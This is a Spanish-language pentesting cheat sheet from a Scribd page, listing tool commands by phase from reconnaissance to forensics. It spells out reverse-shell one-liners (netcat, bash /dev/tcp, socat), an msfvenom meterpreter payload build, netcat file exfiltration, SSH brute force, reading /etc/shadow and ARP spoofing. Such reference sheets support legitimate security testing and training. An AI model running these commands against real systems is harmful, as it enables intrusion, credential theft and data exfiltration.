0% encontró este documento útil (0 votos)
409 vistas4 páginas

Hoja de Comandos para Pentesting (Cheat Sheet)

La hoja de comandos para pentesting proporciona una lista de herramientas y comandos esenciales para realizar pruebas de penetración en diversas etapas, incluyendo reconocimiento de red, enumeración, ataques de contraseñas, pruebas en aplicaciones web, explotación, post-explotación, escalamiento de privilegios, exfiltración de datos, túneles y redirección de puertos, así como análisis forense. Cada sección incluye comandos específicos con su respectiva sintaxis y propósito. Esta guía es útil para profesionales de la seguridad informática que buscan realizar auditorías de seguridad efectivas.

Cargado por

nomasaudiossmr
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
409 vistas4 páginas

Hoja de Comandos para Pentesting (Cheat Sheet)

La hoja de comandos para pentesting proporciona una lista de herramientas y comandos esenciales para realizar pruebas de penetración en diversas etapas, incluyendo reconocimiento de red, enumeración, ataques de contraseñas, pruebas en aplicaciones web, explotación, post-explotación, escalamiento de privilegios, exfiltración de datos, túneles y redirección de puertos, así como análisis forense. Cada sección incluye comandos específicos con su respectiva sintaxis y propósito. Esta guía es útil para profesionales de la seguridad informática que buscan realizar auditorías de seguridad efectivas.

Cargado por

nomasaudiossmr
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

Hoja de Comandos para Pentesting (Cheat Sheet)

Reconocimiento de Red

●​ whois <dominio>: Obtener información sobre un dominio.


●​ nslookup <dominio>: Realizar consultas DNS.
●​ dig <dominio>: Consultas DNS detalladas.
●​ ping <IP>: Comprobar si un host está activo.
●​ traceroute <IP>: Rastrear la ruta que toman los paquetes hacia un host.
●​ nmap -sC -sV -oN scan.txt <IP>: Escaneo de servicios y detección de
versiones.
●​ nmap -Pn -A <IP>: Escaneo agresivo sin ping.
●​ masscan -p1-65535 <IP> --rate 1000: Escaneo rápido de puertos.
●​ amass enum -d <dominio>: Enumeración avanzada de subdominios.
●​ theHarvester -d <dominio> -l 500 -b all: Recolectar correos, nombres y
hosts asociados a un dominio.
●​ shodan search <query>: Buscar activos vulnerables en Shodan.

Enumeración

●​ enum4linux -a <IP>: Enumerar recursos y usuarios en SMB.


●​ smbclient -L //<IP>: Listar recursos compartidos en SMB.
●​ ldapsearch -x -h <IP>: Enumerar información LDAP.
●​ rpcclient -U "" <IP>: Enumerar servicios RPC.
●​ ftp <IP>: Verificar si FTP anónimo está habilitado.
●​ curl -I <URL>: Obtener encabezados HTTP.
●​ whatweb <URL>: Identificar tecnologías utilizadas en un sitio web.
●​ snmpwalk -v 2c -c <comunidad> <IP>: Enumerar información SNMP.

Ataques de Contraseñas

●​ hydra -l <usuario> -P <diccionario> <IP> ssh: Fuerza bruta en SSH.


●​ medusa -u <usuario> -P <diccionario> -h <IP> -M smbnt: Fuerza
bruta en SMB.
●​ john --wordlist=<diccionario> <archivo_hash>: Descifrar hashes con
John the Ripper.
●​ hashcat -m <tipo_hash> <archivo_hash> <diccionario>: Descifrar
hashes con Hashcat.
●​ cewl -d 3 -m 5 -w <output.txt> <URL>: Generar diccionario personalizado
desde palabras encontradas en un sitio web.

Pruebas en Aplicaciones Web

●​ gobuster dir -u <URL> -w <diccionario>: Fuerza bruta de directorios.


●​ gobuster dns -d <dominio> -w <diccionario>: Fuerza bruta de
subdominios.
●​ nikto -h <URL>: Escaneo de vulnerabilidades en servidores web.
●​ wfuzz -c -z file,<diccionario> --hc 404 <URL>/FUZZ: Fuzzing de
directorios.
●​ sqlmap -u <URL> --dbs: Test de inyección SQL y listado de bases de datos.
●​ wpscan --url <URL>: Escaneo de sitios WordPress.
●​ burpsuite: Usar proxy para analizar y modificar solicitudes HTTP/S.

Explotación

●​ searchsploit <software>: Buscar exploits públicos.


●​ msfconsole: Iniciar Metasploit Framework.
○​ use exploit/<ruta>: Seleccionar un exploit.
○​ set RHOST <IP>: Establecer host remoto.
○​ set LHOST <IP>: Establecer host local.
○​ run: Ejecutar el exploit.
●​ python3 -m http.server <puerto>: Iniciar un servidor HTTP rápido.
●​ nc -e /bin/bash <IP> <puerto>: Crear una reverse shell (en el lado del
atacante).
●​ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP>
LPORT=<puerto> -f exe > shell.exe: Crear un payload ejecutable.

Post-Explotación

●​ whoami: Identificar el usuario actual.


●​ hostname: Mostrar el nombre del host.
●​ id: Mostrar IDs de usuario y grupo.
●​ ifconfig o ip a: Mostrar interfaces de red.
●​ netstat -ano: Listar conexiones de red activas.
●​ cat /etc/passwd: Leer el archivo passwd.
●​ cat /etc/shadow: Leer contraseñas encriptadas (requiere root).
●​ find / -perm -4000 2>/dev/null: Buscar binarios con SUID.
●​ ps aux: Listar procesos en ejecución.
●​ crontab -l: Ver tareas programadas del cron.

Escalamiento de Privilegios

●​ sudo -l: Listar permisos sudo.


●​ gtfobins: Buscar binarios que permitan escalar privilegios.
●​ linpeas.sh: Usar LinPEAS para enumerar vectores de escalamiento.
●​ find / -type f -name "*.conf": Buscar archivos de configuración.
●​ exploit suggester: Usar Metasploit para encontrar exploits de escalamiento.
●​ pwndb: Buscar posibles filtraciones de credenciales asociadas a un dominio.
Exfiltración de Datos

●​ scp archivo.txt usuario@<IP>:/ruta/destino: Copiar un archivo de


manera segura.
●​ nc -lvp <puerto>: Configurar un listener para transferencia de archivos.
●​ tar czf - archivo.txt | nc <IP> <puerto>: Transferir un archivo usando
netcat.
●​ rsync -avz archivo.txt usuario@<IP>:/ruta/destino: Transferir datos
de forma eficiente.

Túneles y Redirección de Puertos

●​ ssh -L <puerto_local>:<host_remoto>:<puerto_remoto>
usuario@<IP>: Redirección de puerto local.
●​ ssh -R <puerto_remoto>:<host_local>:<puerto_local>
usuario@<IP>: Redirección de puerto remoto.
●​ ssh -D <puerto> usuario@<IP>: Proxy dinámico SOCKS.
●​ socat TCP-LISTEN:<puerto>,fork EXEC:"/bin/bash": Crear un shell
remoto.

Herramientas de Red

●​ tcpdump -i <interfaz>: Capturar paquetes en una interfaz.


●​ wireshark: Análisis de paquetes con GUI.
●​ ettercap -T -M arp:remote /<IP_objetivo>/ /<IP_puerta>/: Realizar
spoofing ARP.
●​ responder -I <interfaz>: Capturar hashes NTLM en la red.

Scripting y Automatización

●​ for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip | grep


"bytes from"; done: Ping sweep en una subred.
●​ python -c 'import pty; pty.spawn("/bin/bash")': Crear un TTY shell.
●​ bash -i >& /dev/tcp/<IP>/<puerto> 0>&1: Crear reverse shell en Bash.

Forense e Ingeniería Inversa

●​ strings <archivo>: Extraer cadenas imprimibles de un archivo.


●​ file <archivo>: Identificar el tipo de archivo.
●​ hexdump -C <archivo>: Ver el contenido de un archivo en hexadecimal.
●​ gdb <binario>: Depurar binarios.
●​ strace <comando>: Trazar llamadas al sistema y señales.

Comandos Comunes y Modificadores Útiles

●​ nmap:
○​ -p-: Escanea todos los puertos (1-65535).
○​ -sU: Escaneo de puertos UDP.
○​ --script=<script>: Ejecuta scripts NSE (Network Security Scripts).
○​ -T4: Acelera el escaneo (niveles de agresividad de 0 a 5).
●​ curl:
○​ -X <método>: Especifica el método HTTP (GET, POST, etc.).
○​ -d '<data>': Enviar datos en una solicitud POST.
○​ -k: Ignorar errores de certificados SSL.
●​ find:
○​ find / -name "<archivo>: Buscar un archivo por nombre.
○​ -type d: Buscar solo directorios.
○​ -exec <comando> {} \;: Ejecutar un comando sobre los resultados.
●​ grep:
○​ grep -i <patrón>: Búsqueda sin distinción de mayúsculas/minúsculas.
○​ grep -r <patrón> <directorio>: Búsqueda recursiva.
○​ grep -v <patrón>: Excluir líneas que coincidan con el patrón.
●​ tar:
○​ tar -czvf <archivo.tar.gz> <directorio>: Comprimir un
directorio.
○​ tar -xzvf <archivo.tar.gz>: Extraer un archivo comprimido.

También podría gustarte